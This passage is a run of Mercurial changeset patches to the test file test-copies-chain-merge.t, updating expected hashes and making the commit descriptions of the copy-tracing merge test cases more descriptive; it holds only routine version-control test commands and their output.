!) 1 8 b004912a8510 000000000000 000000000000 - 2 22 c72365ee036f 000000000000 000000000000 (no-changeset !) - 2 25 68d5bca9df05 b80de5d13875 000000000000 (changeset !) + 2 22 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) + 2 25 5cce88bf349f ae258f702dfe 000000000000 (changeset !) Log output should not include a merge commit as it did not happen @@ -1183,30 +1194,30 @@ #if no-changeset $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - eb806e34ef6be4c264effd5933d31004ad15a793 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - eb806e34ef6be4c264effd5933d31004ad15a793 644 f + 2ff93c643948464ee1f871867910ae43a45b0bea 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - 0dd616bc7ab1a111921d95d76f69cda5c2ac539c 644 f + b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - 6da5a2eecb9c833f830b67a4972366d49a9a142c 644 f + e8825b386367b29fec957283a80bb47b47483fe1 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 0dd616bc7ab1 000000000000 000000000000 - 1 10 6da5a2eecb9c 000000000000 000000000000 - 2 19 eb806e34ef6b 0dd616bc7ab1 6da5a2eecb9c + 0 4 b76eb76580df 000000000000 000000000000 + 1 10 e8825b386367 000000000000 000000000000 + 2 19 2ff93c643948 b76eb76580df e8825b386367 #else $ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("a-2")' | grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg manifest --debug --rev 'desc("e-2")' | grep '644 f' - b80de5d138758541c5f05265ad144ab9fa86d1db 644 f + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f $ hg debugindex f rev linkrev nodeid p1 p2 - 0 4 b80de5d13875 000000000000 000000000000 + 0 4 ae258f702dfe 000000000000 000000000000 #endif # Here the filelog based implementation is not looking at the rename @@ -1509,15 +1520,15 @@ Details on this hash ordering pick: $ hg manifest --debug 'desc("g-1")' | egrep 'd$' - 7bded9d9da1f7bf9bf7cbfb24fe1e6ccf68ec440 644 d (no-changeset !) - 68d5bca9df0577b6bc2ea30ca724e13ead60da81 644 d (changeset !) + 17ec97e605773eb44a117d1136b3849bcdc1924f 644 d (no-changeset !) + 5cce88bf349f7c742bb440f2c53f81db9c294279 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("g-1")' d A d a (no-changeset no-compatibility !) $ hg manifest --debug 'desc("f-2")' | egrep 'd$' - c72365ee036fca4fb27fd745459bfb6ea1ac6993 644 d (no-changeset !) - b80de5d138758541c5f05265ad144ab9fa86d1db 644 d (changeset !) + 7b79e2fe0c8924e0e598a82f048a7b024afa4d96 644 d (no-changeset !) + ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !) $ hg status --copies --rev 'desc("i-0")' --rev 'desc("f-2")' d A d h (no-changeset no-compatibility !) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449163 -3600 # Tue Feb 16 05:19:23 2021 +0100 # Node ID c9f5027217831272db68c96233b104ae3b9882b5 # Parent d46885119f902efc5409d687fcf1f38043c265b4 test-copies: use intermediate variable some commit descriptions Right now, everything mostly says "simple merge", we want to use something a bit more descriptive. Before doing any changes, we do most of the churn. This helps the next sets of changesets to be clearer. Differential Revision: https://phab.mercurial-scm.org/D10036 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -185,18 +185,20 @@ - rename on one side - unrelated change on the other side + $ case_desc="simple merge" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("a-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBAm-0 simple merge - one way' + $ hg ci -m "mBAm-0 $case_desc - one way" $ hg up 'desc("a-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mABm-0 simple merge - the other way' + $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' @ 12 mABm-0 simple merge - the other way @@ -225,12 +227,14 @@ - one deleting the change and recreate an unrelated file after the merge + $ case_desc="simple merge" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBCm-0 simple merge - one way' + $ hg ci -m "mBCm-0 $case_desc - one way" $ echo bar > d $ hg add d $ hg ci -m 'mBCm-1 re-add d' @@ -239,7 +243,7 @@ $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mCBm-0 simple merge - the other way' + $ hg ci -m "mCBm-0 $case_desc - the other way" created new head $ echo bar > d $ hg add d @@ -271,18 +275,20 @@ - one with change to an unrelated file - one deleting and recreating the change + $ case_desc="simple merge" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBDm-0 simple merge - one way' + $ hg ci -m "mBDm-0 $case_desc - one way" $ hg up 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDBm-0 simple merge - the other way' + $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' @ 18 mDBm-0 simple merge - the other way @@ -309,13 +315,15 @@ - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) + $ case_desc="simple merge" + $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("e-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mAEm-0 simple merge - one way' + $ hg ci -m "mAEm-0 $case_desc - one way" $ hg up 'desc("e-2")' 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) @@ -323,7 +331,7 @@ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mEAm-0 simple merge - the other way' + $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' @ 20 mEAm-0 simple merge - the other way @@ -350,6 +358,8 @@ - one with change to an unrelated file (b) - one overwriting a file (d) with a rename (from h to i to d) + $ case_desc="simple merge" + $ hg up 'desc("i-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg mv h i @@ -370,13 +380,13 @@ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mBFm-0 simple merge - one way' + $ hg ci -m "mBFm-0 $case_desc - one way" $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mFBm-0 simple merge - the other way' + $ hg ci -m "mFBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' @ 24 mFBm-0 simple merge - the other way @@ -404,6 +414,8 @@ Unlike in the 'BD/DB' cases, an actual merge happened here. So we should consider history and rename on both branch of the merge. + $ case_desc="simple merge" + $ hg up 'desc("i-2")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) @@ -416,14 +428,14 @@ merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDGm-0 simple merge - one way' + $ hg ci -m "mDGm-0 $case_desc - one way" $ hg up 'desc("g-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' --tool :union merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mGDm-0 simple merge - the other way' + $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' @ 27 mGDm-0 simple merge - the other way @@ -457,6 +469,8 @@ | | The current code arbitrarily pick one side + $ case_desc="simple merge" + $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' --tool :union @@ -464,7 +478,7 @@ 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mFGm-0 simple merge - one way' + $ hg ci -m "mFGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) @@ -474,7 +488,7 @@ 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mGFm-0 simple merge - the other way' + $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' @ 29 mGFm-0 simple merge - the other way # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449606 -3600 # Tue Feb 16 05:26:46 2021 +0100 # Node ID e20977208924f715aef4671888424496d04a73cd # Parent c9f5027217831272db68c96233b104ae3b9882b5 test-copies: improve description of the A+B case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10037 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -185,7 +185,7 @@ - rename on one side - unrelated change on the other side - $ case_desc="simple merge" + $ case_desc="simple merge - A side: multiple renames, B side: unrelated update" $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -201,9 +201,9 @@ $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - @ 12 mABm-0 simple merge - the other way + @ 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ | o 5 b-1: b update | | @@ -682,9 +682,9 @@ i-0 initial commit: a b h i-1: a -move-> c i-2: c -move-> d - mABm-0 simple merge - the other way + mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way mAEm-0 simple merge - one way - mBAm-0 simple merge - one way + mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 mBCm-0 simple merge - one way mBCm-1 re-add d @@ -973,9 +973,9 @@ - unrelated change on the other side $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - o 12 mABm-0 simple merge - the other way + o 12 mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o 11 mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ | o 5 b-1: b update | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449744 -3600 # Tue Feb 16 05:29:04 2021 +0100 # Node ID 979838adc46b5337b4e54679f17b57ca544b96ee # Parent e20977208924f715aef4671888424496d04a73cd test-copies: improve description of the B+C case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10038 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -227,7 +227,7 @@ - one deleting the change and recreate an unrelated file after the merge - $ case_desc="simple merge" + $ case_desc="simple merge - C side: delete a file with copies history , B side: unrelated update" $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -251,11 +251,11 @@ $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' @ 16 mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o 15 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ | | o 14 mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ | o 6 c-1 delete d | | @@ -686,12 +686,12 @@ mAEm-0 simple merge - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 - mBCm-0 simple merge - one way + mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d mBDm-0 simple merge - one way mBFm-0 simple merge - one way mCB-revert-m-0 - mCBm-0 simple merge - the other way + mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 mCH-delete-before-conflict-m-0 @@ -1034,11 +1034,11 @@ $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' o 16 mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o 15 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ | | o 14 mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o 13 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ | o 6 c-1 delete d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613449940 -3600 # Tue Feb 16 05:32:20 2021 +0100 # Node ID 9a58f9eed30337da4bb442dd25c262a69827db4d # Parent 979838adc46b5337b4e54679f17b57ca544b96ee test-copies: improve description of the B+D case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10039 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -275,7 +275,7 @@ - one with change to an unrelated file - one deleting and recreating the change - $ case_desc="simple merge" + $ case_desc="simple merge - B side: unrelated update, D side: delete and recreate a file (with different content)" $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved @@ -291,9 +291,9 @@ $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - @ 18 mDBm-0 simple merge - the other way + @ 18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ | o 8 d-2 re-add d | | @@ -688,14 +688,14 @@ mBC-revert-m-0 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way mBCm-1 re-add d - mBDm-0 simple merge - one way + mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way mBFm-0 simple merge - one way mCB-revert-m-0 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d mCGm-0 mCH-delete-before-conflict-m-0 - mDBm-0 simple merge - the other way + mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 simple merge - one way mEAm-0 simple merge - the other way mFBm-0 simple merge - the other way @@ -1108,9 +1108,9 @@ - one deleting and recreating the change $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - o 18 mDBm-0 simple merge - the other way + o 18 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o 17 mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ | o 8 d-2 re-add d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613450118 -3600 # Tue Feb 16 05:35:18 2021 +0100 # Node ID 19f490690880572782a482f556ddfdfed05d457b # Parent 9a58f9eed30337da4bb442dd25c262a69827db4d test-copies: improve description of the A+E case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10040 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -315,7 +315,7 @@ - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) - $ case_desc="simple merge" + $ case_desc="merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f)" $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -334,9 +334,9 @@ $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - @ 20 mEAm-0 simple merge - the other way + @ 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ | o 10 e-2 g -move-> f | | @@ -683,7 +683,7 @@ i-1: a -move-> c i-2: c -move-> d mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way - mAEm-0 simple merge - one way + mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way mBC-revert-m-0 mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way @@ -697,7 +697,7 @@ mCH-delete-before-conflict-m-0 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 simple merge - one way - mEAm-0 simple merge - the other way + mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way mFGm-0 simple merge - one way mGCm-0 @@ -1188,9 +1188,9 @@ - the "a-" branch renaming d to f (through e) $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - o 20 mEAm-0 simple merge - the other way + o 20 mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o 19 mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ | o 10 e-2 g -move-> f | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613450362 -3600 # Tue Feb 16 05:39:22 2021 +0100 # Node ID 1e96fdcc8bc1387544ed205916650f74d2058c38 # Parent 19f490690880572782a482f556ddfdfed05d457b test-copies: improve description of the D+G case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10041 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -414,7 +414,7 @@ Unlike in the 'BD/DB' cases, an actual merge happened here. So we should consider history and rename on both branch of the merge. - $ case_desc="simple merge" + $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content" $ hg up 'desc("i-2")' 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) @@ -438,9 +438,9 @@ $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - @ 27 mGDm-0 simple merge - the other way + @ 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ | o 25 g-1: update d | | @@ -696,12 +696,12 @@ mCGm-0 mCH-delete-before-conflict-m-0 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way - mDGm-0 simple merge - one way + mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way mFGm-0 simple merge - one way mGCm-0 - mGDm-0 simple merge - the other way + mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 simple merge - the other way mHC-delete-before-conflict-m-0 @@ -1400,9 +1400,9 @@ consider history and rename on both branch of the merge. $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - o 27 mGDm-0 simple merge - the other way + o 27 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ | o 25 g-1: update d | | @@ -1456,7 +1456,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | @@ -1485,7 +1485,7 @@ #else BROKEN: `hg log --follow <file>` relies on filelog metadata to work $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613450792 -3600 # Tue Feb 16 05:46:32 2021 +0100 # Node ID 2f99dedf96b10f62e45bc052c48f62de7b42676d # Parent 1e96fdcc8bc1387544ed205916650f74d2058c38 test-copies: improve description of the G+F case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10042 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -469,7 +469,7 @@ | | The current code arbitrarily pick one side - $ case_desc="simple merge" + $ case_desc="merge - G side: content change, F side: copy overwrite, no content change" $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved @@ -491,9 +491,9 @@ $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - @ 29 mGFm-0 simple merge - the other way + @ 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ | o 25 g-1: update d | | @@ -699,10 +699,10 @@ mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way - mFGm-0 simple merge - one way + mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way mGCm-0 mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way - mGFm-0 simple merge - the other way + mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 @@ -1441,7 +1441,7 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | @@ -1470,7 +1470,7 @@ #if no-changeset $ hg log -Gfr 'desc("mDGm-0")' d - o 26 mDGm-0 simple merge - one way + o 26 mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way |\ | o 25 g-1: update d | | @@ -1506,9 +1506,9 @@ $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - o 29 mGFm-0 simple merge - the other way + o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ | o 25 g-1: update d | | @@ -1584,7 +1584,7 @@ #if no-changeset $ hg log -Gfr 'desc("mFGm-0")' d - o 28 mFGm-0 simple merge - one way + o 28 mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way |\ | o 25 g-1: update d | | @@ -1610,7 +1610,7 @@ #if no-changeset $ hg log -Gfr 'desc("mGFm-0")' d - o 29 mGFm-0 simple merge - the other way + o 29 mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ | o 25 g-1: update d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613451295 -3600 # Tue Feb 16 05:54:55 2021 +0100 # Node ID a1a06dca6941e31758bfdf7392118692dcbfa035 # Parent 2f99dedf96b10f62e45bc052c48f62de7b42676d test-copies: improve description of the G+C case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10043 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -520,6 +520,8 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. + $ case_desc="merge updated/deleted - revive the file (updated content)" + $ hg up 'desc("c-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' @@ -531,7 +533,7 @@ [1] $ hg resolve -t :other d (no more unresolved files) - $ hg ci -m "mCGm-0" + $ hg ci -m "mCGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' @@ -545,13 +547,13 @@ [1] $ hg resolve -t :local d (no more unresolved files) - $ hg ci -m "mGCm-0" + $ hg ci -m "mGCm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - @ 31 mGCm-0 + @ 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o 30 mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ | o 25 g-1: update d | | @@ -693,14 +695,14 @@ mCB-revert-m-0 mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way mCBm-1 re-add d - mCGm-0 + mCGm-0 merge updated/deleted - revive the file (updated content) - one way mCH-delete-before-conflict-m-0 mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way mFBm-0 simple merge - the other way mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way - mGCm-0 + mGCm-0 merge updated/deleted - revive the file (updated content) - the other way mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way mHC-delete-before-conflict-m-0 @@ -1647,9 +1649,9 @@ copy tracing chain. $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - o 31 mGCm-0 + o 31 mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o 30 mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ | o 25 g-1: update d | | # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1613451502 -3600 # Tue Feb 16 05:58:22 2021 +0100 # Node ID 311a18777f45e9be069f8adc83bb34620aa5ef30 # Parent a1a06dca6941e31758bfdf7392118692dcbfa035 test-copies: improve description of the B+C "revert/restore" case This will make its role clearer. Differential Revision: https://phab.mercurial-scm.org/D10044 diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -579,13 +579,15 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + $ hg up 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mCB-revert-m-0" + $ hg ci -m "mCB-revert-m-0 $case_desc - one way" created new head $ hg up 'desc("b-1")' @@ -594,13 +596,13 @@ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mBC-revert-m-0" + $ hg ci -m "mBC-revert-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - @ 33 mBC-revert-m-0 + @ 33 mBC-revert-m-0 merge 